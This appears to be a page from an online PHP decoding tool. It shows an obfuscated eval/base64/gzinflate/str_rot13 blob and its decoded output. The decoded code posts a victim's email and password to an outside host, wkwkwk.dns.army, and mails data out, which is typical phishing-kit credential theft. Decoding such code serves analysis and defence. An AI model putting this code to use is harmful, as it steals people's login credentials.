Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(str_rot13(gzinflate(str_rot13(base64_decode('hZBOeAMhEIXvgfwHD0U3IC69tuSQBGpmKu0GCjkt..

Decoded Output download


$datamail = mail($raflipedia, $subject, $message, $headersx);
$ch = curl_init();
$post_data = 'email='.$user.'&password='.$pass;
curl_setopt($ch, CURLOPT_URL, 'http://wkwkwk.dns.army/file.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_POST,1);
$tampil = curl_exec($ch);
curl_close($ch);

Did this file decode correctly?

Original Code

eval(str_rot13(gzinflate(str_rot13(base64_decode('hZBOeAMhEIXvgfwHD0U3IC69tuSQBGpmKu0GCjktTGRckm9o0rVof33VT44pHubxfO+DmeWCbXjseVAkeJJUUrW9xqDQB8sJhfHzG51Wd1MA+4VWWnU9d7isnpcL6qZHZ6OOfTgFRhVCDWD6zFpfDDNozQQdAbVgD8oCnAfts5VoKpQ6oBmUqRKQk9e9PGFqep8GJ3kyUz3V9fknP+FCIKyeP+p4iCjUpNjqHk9p7V5hTfmydg6d5OTxYW23etrDe2p8eNKetzX+rfBPpemQqhyyhPGCLlRiehcHwD/nFw==')))));

Function Calls

gzinflate 1
str_rot13 2
base64_decode 1

Variables

None

Stats

MD5 6061236c98dd66fd5c7bc5cf70aca7e6
Eval Count 1
Decode Time 96 ms